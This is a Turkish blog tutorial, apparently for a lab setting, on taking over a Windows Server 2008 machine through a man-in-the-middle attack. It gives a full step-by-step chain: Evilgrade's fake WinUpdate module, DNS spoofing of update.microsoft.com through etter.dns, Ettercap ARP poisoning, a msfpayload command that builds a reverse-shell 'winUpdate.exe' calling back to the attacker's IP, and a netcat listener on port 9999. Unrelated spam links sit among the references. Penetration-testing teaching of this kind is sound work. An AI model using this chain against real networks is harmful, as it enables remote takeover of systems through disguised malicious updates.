1. Anasayfa
  2. Üretici Teknolojileri

MITM Saldırı Yöntemi ile Windows Server 2008 Nasıl Hack Edilir


2

Bu makalemde “MITM (Man in The Middle – Ortadaki Adam)” saldırısı yaparak Windows Server 2008Windows Server 2012 işletim sistemlerinin hack edilmesine değineceğiz. Yapacağımız işlem, “DNS Spoof” ve “MITM” saldırısını uygulamalı örnek ile pekiştirecektir.

Senaryo 1: Saldırgan, networkte bulunan bir Windows Server 2008 işletim sistemini hedef almaktadır. Bu Windows 2008 (kurban) işletim sistemi Microsoft Update (http://Update.Microsoft.com) web sitesinden bir Update paketi indirmek istediğinde, bizim oluşturmuş olduğumuz zararlı kodları indirerek çalıştıracak. Bu zararlı kodlar sayesinde Windows Server 2008 işletim sisteminin yönetimini ele geçireceğiz.

Araç ve gereçler:

  • Kali Linux (Ya da BackTrack 5 R2- R3)
  • Windows Server 2008
  • Evilgrade
  • Ettercap
  • Netcat (nc)

Kali Linux’u açarak networkte iletişim kuracak halde olmasını sağlayınız (Bu makale Kali Linux kullanıldığı varsayılarak hazırlanmıştır). Bu işlemi kendi laboratuvarımızı kullanarak yapacağımız için, Windows Server 2008 ile Kali Linux arasında NAT veya Bridget ağ kartının olması gerekmektedir. NAT ve Bridget ağ kartı eklemek için bu adreste bulunan makaleyi takip edebilirsiniz.


Resim-1

Bu makale boyunca saldırganın ip adresi (Kali Linux) Resim-1’deki gibi 192.168.88.129 olacaktır.


Resim-2

Bu makale boyunca kurbanın IP adresi (Windows Server 2008) Resim-2’deki gibi 192.168.88.133 olacaktır.

Kali Linux’u açıp “terminal”i çalıştıralım. “Evilgrade” yazarak Enter ile devam edelim ve ya “Alt – F2” tuş kombinasyonu ile uygulama çalıştır ekranını açarak “Evilgrade” yazarak çalıştırı tıklayalım.


Resim-3

Evilgrade Resim-3 gibi açılacaktır. Evilgrade içerisinde “DNS kandırısı (DNS Spoof)” için kullanmak üzere 63 adet modül bulunmaktadır. Biz sahte Windows Update paketleri hazırlayacağımız için “WinUpdate” modülünü kullanacağız.


Resim-4

“Configure WinUpdate” komutu ile “WinUpdate” paketini kullanacağımızı ve onu konfigüre edeceğimizi belirtiyoruz.


Resim-5

“Show options” komutu ile konfigüre edeceğimiz modülün özellikleri Resim-6’daki gibi görünecektir.

  • VirtualHost: Bu kısım DNS spoof yapmamız gereken adresleri göstermektedir. DNS spoof işlemini yaptıktan sonra kullanıcı Update.Microsoft.com adresine girdiğinde bizim belirtmiş olduğumuz IP adresine yönlenecektir.
  • Agent: Kurbana göndereceğimiz zararlı dosyamızın yolu olacak şekilde ayarlanmalıdır.

VirtualHost kısmını ayarlamak için yeni bir terminal ekranı açarak spoof edeceğimiz DNS adreslerini Kali Linux’un IP adresleri ile değiştirmemiz gerekmektedir.


Resim-6

“Pico /usr/share/ettercap/etter.dns” komutu ile spoof edeceğimiz DNS adreslerini belirtmek için etter.dns dosyasını pico editörü ile açıyoruz.


Resim-7

Resim-5’te bulunan adresleri Resim-7’deki gibi Pico editörü ile etter.dns dosyasına yazıyoruz. Örneğin windowsUpdate.Microsoft.com adresi için “A” kaydı girerek IP adresi olarak ta 192.168.88.129 yani Kali Linux’un IP adresini belirtmişiz. Kullanıcı spoof işleminden sonra windowsUpdate.Microsoft.com adresine girdiğinde 192.168.88.129 adresine yönlenecektir. DNS adreslerini girdikten sonra “CTRL + 0” ile değişikliği etter.dns dosyasına yazıyoruz ve “CTRL + X” ile pico editöründen çıkıyoruz.

Ardından Evilgrade ekranına geri dönerek “Agent”ımızı konfigüre etmemiz gerekiyor.


Resim-8

“Set agent” komutu ile zararlı yazılımımızı oluşturup agent olarak atamamız gerekmektedir (Terminal ekranında bu komut tam görünmüyor. Terminal ekranında bir sorun var sanırım.) Bunun için set agent ‘[“/opt/metasploit/apps/pro/msf3/msfPayload windows/shell_reverse_tcp LHOST=192.168.88.129 LPORT=9999 X > <%OUT%>/tmp/winUpdate.exe<%OUT%>”]’ komutunu giriyoruz. Bu komut ile Metasploit’in Payloadlarından “Windows/shell_reverse_tcp” Payload’ını kullanacağımızı, bu Payload’ın LHOST ip adresinin (geri dönüş ip adresi) 192.168.88.129 (Kali Linux’un IP Adresi) ve LPORT (geri dönüş portunun) 9999 olduğunu, X > komutu ile de bunu /tmp dizininde winUpdate.exe adında oluşturmasını söylüyoruz. Böylece shell_reverse_tcp Payloadı /tmp dizininde winUpdate.exe adında bir exe dosyası haline gelecektir.


Resim-9

Bu işlemin hemen ardından “Start” komutu ile Evilgrade’i başlatıyoruz. Evilgrade başladığında “[DNSSERER] – DNS Server Ready. Waiting for Connections” yazacaktır. Bu durumda Evilgrade başarılı bir şekilde başlamış ve kurbanın Sunucuya bağlanması bekleniyor diye anlayabiliriz.

“ALT + F2” tuş kombinasyonu ile veya yeni bir terminal ekranı açıp, “ettercap –G” komutu ile ettercap’in grafiksek ara yüzüne erişiyoruz.


Resim-10

Ettercap açıldıktan sonra “Sniff” menüsünde bulunan “Unified sniffing”i seçiyoruz. Bu seçeneği seçtiğimizde bize hangi ağ kartını Sniff etmek istediğimizi soracaktır. İlgili ağ kartımızı (eth0, eth1, wlan0 vb) seçerek ilerliyoruz.


Resim-11

Plugins menüsünden “Manage the Plugins”i tıklıyoruz. Plugins menüsü Resim-11’deki gibi açılacaktır. Buradan “dns_spoof”u çift tıklayarak Dns Spoofing yapacağımızı belirtiyoruz. “Dns_Spoof”u çift tıkladığımızda sol tarafta bir yıldız (*) görünecektir.


Resim-12

Hosts menüsünden “Scan for hosts”u seçerek networkte bulunan cihazları tespit etmesini sağlıyoruz.


Resim-13

MITM menüsünden “ARP Poisoning” i seçiyoruz. Karşımıza Resim-13’teki gibi bir ekran gelecek. Bu ekranda en üstteki seçenek olan “Sniff Remote Connections” ı seçip tamam diyoruz.


Resim-14

Bu işlemlerin ardından Start menüsünden “Start Sniffing” ile MITM saldırısı başlatıyoruz.

Geriye tek bir işlem kaldı. Kullanıcı oluşturduğumuz sahte Update web sitesinden indireceği zararlı yazılımı çalıştırdığında, Reverse Connection yapan Payload’ın gelen isteklerini kabul ederek yönetimi ele almamız. Bunun için de “Netcat” kullanacağız.


Resim-15

Yeni bir terminal ekranı açarak “nc –l –v –p 9999” komutunu yazıyoruz. Bu komut Payload oluştururken LPORT olarak belirttiğimiz 9999 portunu dinleyecek ve bir bağlantı gelmesi durumunda onu üzerimize almamızı sağlayacaktır.


Resim-16

Kurban http://Update.Microsoft.com adresine girdiğinde Resim-16 ekranı ile karşılaşacaktır. Kullanıcının Update yapabilmesi için “Download and Install Now” butonuna basması gerekiyor. Kullanıcı bunu tıkladığında oluşturduğumuz Payload yüklenecektir.


Resim-17

Kurban oluşturduğumuz Payloadı açtığında Resim-17’deki gibi Netcat ile yönetimi ele geçirmiş olacağız. Konu ile ilgili videoyu aşağıdan seyredebilirsiniz.

MITM Saldırı Yöntemi ile Windows Server 2008 Nasıl Hack Edilir from MSHOWTO on Vimeo.

Bu konuyla ilgili sorularınızı  alt kısımda bulunan yorumlar alanını kullanarak sorabilirsiniz.

Referanslar

www.mshowto.org http://credit-n.ru/potreb-kredit.html http://credit-n.ru/offers-zaim/lime-zaim-zaymi-online.html

Bu İçeriğe Tepkin Ne Oldu?
  • 2
    harika_
    Harika!!
  • 1
    be_enmedim
    Beğenmedim
  • 0
    _ok_iyi
    Çok iyi
  • 0
    sevdim_
    Sevdim!
  • 1
    bilemedim_
    Bilemedim!
  • 0
    olmad_
    Olmadı!
  • 0
    k_zd_m_
    Kızdım!

15+ yıllık siber güvenlik dünyasındaki çalışmaları ile tanınan Eyüp Çelik, birçok defans ve hack grubunu yöneterek siber güvenlik alanında adını duyurmuştur.Doksanlı yıllardan bu yana siber güvenlik alanında çalışmalarını sürdüren Eyüp Çelik’in uzmanlık alanları arasında sistem, ağ alt yapısı, veritabanı yapıları, yazılım ve web en başta gelmektedir. Visual C++, C# ve benzeri dillerde 10 yılı aşkın tecrübeye sahip olan Eyüp Çelik .NET platformu üzerinde siber güvenlik (hacking) araçları geliştirerek blogu üzerinden paylaşmakta ve açık kaynak dünyasına hediye etmektedir.Profesyonel iş hayatındaki kariyerine 2006 yılından sonra beyaz şapkalı hacker olarak devam eden Çelik, ülkemizin en önemli bilişim, adli analiz ve bilgi güvenliği firmalarında beyaz şapkalı hacker, defans ve ar-ge ekiplerini yönetmiştir. Aynı zamanda eğitmen kimliği ile birçok farklı üniversitede ve kurumda 200’den fazla konferansa katılarak siber güvenlik sektörüne değer katmıştır. Eğitimler, konferanslar ve benzeri birçok alanda üniversite öğrencilerine yön gösterici kimliği ile tanınan Eyüp Çelik, ülkemizin önde gelen eğitim kurumlarında etik hackerlik, web güvenliği, ileri seviye sızma testleri ve benzeri birçok konuda eğitimler vermeye devam etmektedir.Kariyerindeki en önemli adımlarını ülkemizin önde gelen danışmanlık firmalarında sürdürmeye devam eden Çelik, Siber Güvenlik ve AR-GE Direktörü ünvanı ile birçok kamu kurumuna ve özel sektördeki kritik kurumlara siber güvenlik danışmanlığı ve eğitim hizmetleri sunmuştur.Boş vakitlerini profesyonel fotoğrafçılık yeteneği ile devam ettiren Çelik, 2018 yılı itibari ile Privia Security ve Kodia firmalarını kurarak, siber güvenlik sektörüne farklı bir bakış açısı getirmeyi amaç edinmiş ve son bir yıldır ülkemizin en değerli kamu ve özel sektör firmalarına siber güvenlik danışmanlığı, AR-GE ve eğitim konularında hizmet vermeye devam etmektedir.

Yazarın Profili

Bültenimize Katılın

Tıklayın, üyemiz olun ve yeni güncellemelerden haberdar olan ilk kişi siz olun.

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Yorumlar (2)

  1. 13/08/2013

    Teşekkürler Hocam güzel bir çalışma olmuş.

  2. 13/08/2013

    Emeğine sağlık Eyüp hocam güzel bir makale olmuş

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir